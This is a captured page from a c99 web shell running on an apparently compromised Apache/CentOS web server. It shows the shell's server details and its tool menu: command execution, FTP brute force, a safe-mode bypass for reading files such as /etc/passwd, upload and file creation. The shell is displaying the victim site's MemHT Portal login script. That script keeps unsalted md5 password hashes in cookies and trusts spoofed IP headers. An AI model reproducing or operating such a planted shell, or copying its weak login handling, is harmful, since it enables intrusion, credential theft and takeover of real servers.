!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/inc/   drwxrwxrwx
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     inc_login.php (6.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/********************************************************************************
	- MemHT Portal -
	
	Copyright (C) 2007-2008 by Miltenovik Manojlo
	http://www.memht.com
	
	This program is free software; you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation; either version 2 of the License, or
	(at your opinion) any later version.
	
	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	GNU General Public License for more details.
	
	You should have received a copy of the GNU General Public License along
	with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)
	or write to the Free Software Foundation, Inc., 51 Franklin Street,
	Fifth Floor, Boston, MA02110-1301, USA.
		
********************************************************************************/

if (stristr(htmlentities($_SERVER['PHP_SELF']), "inc_login.php")) {
	die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");
}

global $dblink,$page,$tzNOW;

//==================================
// Find IP
//==================================
if (@getenv("HTTP_CLIENT_IP")) {
	$visitorInfo['ip'] = getenv("HTTP_CLIENT_IP");
} else if (@getenv("HTTP_X_FORWARDED_FOR")) {
	$visitorInfo['ip'] = getenv('HTTP_X_FORWARDED_FOR');
} else if (@getenv('REMOTE_ADDR')) {
	$visitorInfo['ip'] = getenv('REMOTE_ADDR');
} else if (isset($_SERVER['REMOTE_ADDR'])) {
	$visitorInfo['ip'] = $_SERVER['REMOTE_ADDR'];
} else {
	$visitorInfo['ip'] = "Unknown";
}
if (!eregi("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$visitorInfo['ip']) AND $visitorInfo['ip']!="Unknown") {
	$pos = strpos($visitorInfo['ip'],",");
	$visitorInfo['ip'] = substr($visitorInfo['ip'],0,$pos);
	if ($visitorInfo['ip']=="") { $visitorInfo['ip'] = "Unknown"; }
}
$visitorInfo['ip'] = eregi_replace("[^0-9\.]","",$visitorInfo['ip']);

function clear() {
	global $cookiecontent,$cookieitem,$cookie_id,$cookie_user,$cookie_pass,$cookcheck,$dblogin_user,$dblogin_pass,$user,$userid,$admin;
	unset ($cookiecontent,$cookieitem,$cookie_id,$cookie_user,$cookie_pass,$cookcheck,$dblogin_user,$dblogin_pass,$user,$userid,$admin);
}

//===========================================
//Post LoginForm
//===========================================
if (memRunHooks('UserPostLoginCheck',array(&$privs))) {
	if (!function_exists("inCode_t")) {
		function inCode_t($string) {
			if (get_magic_quotes_gpc()) { $string = stripslashes($string); }
			$string = htmlentities($string,ENT_QUOTES);
			return mysql_real_escape_string($string);
		}
	}

	if (isset($_POST['login']) AND isset($_POST['post_username']) AND isset($_POST['post_password'])) {
		if ($dblink->get_num("SELECT attempts FROM memht_login_flood WHERE ip='".$visitorInfo['ip']."' AND attempts>=5")) {
			die(_YOUMUSTWAITTOLOGINAGAIN_);
		} else {
			if ($chk = $dblink->get_row("SELECT id,user,enabled FROM memht_utenti WHERE user='".inCode_t($_POST['post_username'])."' AND pass='".md5($_POST['post_password'])."'")) {
				//Login Correct
				$login_id = intval($chk['id']);
				$login_user = $chk['user'];
				$login_enabled = intval($chk['enabled']);
				if ($login_enabled) {
					//Update account lastlogin and lastip
					$dblink->query("UPDATE memht_utenti SET lastip='".$visitorInfo['ip']."',lastlogin=$tzNOW WHERE id=$login_id");
					//Account Ok
					$cookiecontent = $login_id."#".md5($login_user)."#".md5($_POST['post_password']);
					setcookie("login_user",$cookiecontent,time()+604800); //1week
					$userid = $login_id;
					$privs['user'] = $cookiecontent;
				} else {
					//Account Disabled
					clear();
					$userid = 0;
					$privs['user'] = false;
					setcookie("login_user","",time()-31536000); //-1year
				}
			} else {
				clear();
				$userid = 0;
				$privs['user'] = false;
				setcookie("login_user","",time()-31536000); //-1year
				//Login Failed -> Antiflood/hack system (Attempts Limiter)
				if ($dblink->get_num("SELECT ip FROM memht_login_flood WHERE ip='".$visitorInfo['ip']."'")>0) {
					$dblink->query("UPDATE memht_login_flood SET time=$tzNOW,attempts=attempts+1 WHERE ip='".$visitorInfo['ip']."'");
				} else {
					$dblink->query("INSERT INTO memht_login_flood (ip,time,attempts) VALUES ('".$visitorInfo['ip']."',$tzNOW,'1')");
				}
			}
			@session_start();
			$redirect_url = @$_SESSION['redirect_url'];
			$redirect_age = @$_SESSION['redirect_age']+90;
			if ($redirect_url!="" AND $redirect_age>=time()) {
				$_SESSION['redirect_url'] = "";
				$_SESSION['redirect_age'] = 0;
				header("Location: $redirect_url");
			} else {
				$_SESSION['redirect_url'] = "";
				$_SESSION['redirect_age'] = 0;
				header("Location: index.php?page=users");
			}
		}
	}
	
	memRunHooks('UserPostLoginCheckEnd',array(&$privs));
}

//===========================================
//Stored Cookie
//===========================================
if (memRunHooks('UserCookieLoginCheck',array(&$privs))) {
	if (isset($_COOKIE['login_user'])) {
		$cookiecontent = $_COOKIE['login_user'];
		$cookieitem = explode("#",$cookiecontent);
		$cookie_id = intval($cookieitem[0]);
		$cookie_user = $cookieitem[1]; //md5
		$cookie_pass = $cookieitem[2]; //md5
		
		//Database Account Control
		$cookcheck = $dblink->get_row("SELECT user,pass FROM memht_utenti WHERE id=$cookie_id");
		if ($cookcheck) {
			$dblogin_user = $cookcheck['user'];
			$dblogin_pass = $cookcheck['pass']; //md5
			
			if ($cookie_user==md5($dblogin_user) AND $cookie_pass==$dblogin_pass) {
				//Login Correct
				$userid = $cookie_id;
				$privs['user'] = $cookiecontent;
				//Update account lastlogin and lastip
				$dblink->query("UPDATE memht_utenti SET lastip='".$visitorInfo['ip']."',lastlogin=$tzNOW WHERE id=$userid");
			} else {
				//Delete Cookie (Error? Hack?)
				clear();
				$userid = 0;
				$privs['user'] = false;
				setcookie("login_user","",time()-31536000); //-1year
			}
		}
	} else {
		$userid = 0;
		$privs['user'] = false;
	}
	
	memRunHooks('UserCookieLoginCheckEnd',array(&$privs));
}

//===========================================
//User logout
//===========================================
if (memRunHooks('UserLogout',array(&$privs))) {
	if (isset($_GET['logout']) && $_GET['logout']==1) {
		clear();
		$privs['user'] = false;
		setcookie("login_user","",time()-31536000); //-1year
		header("Location: index.php");
	}
	
	memRunHooks('UserLogoutEnd',array(&$privs));
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--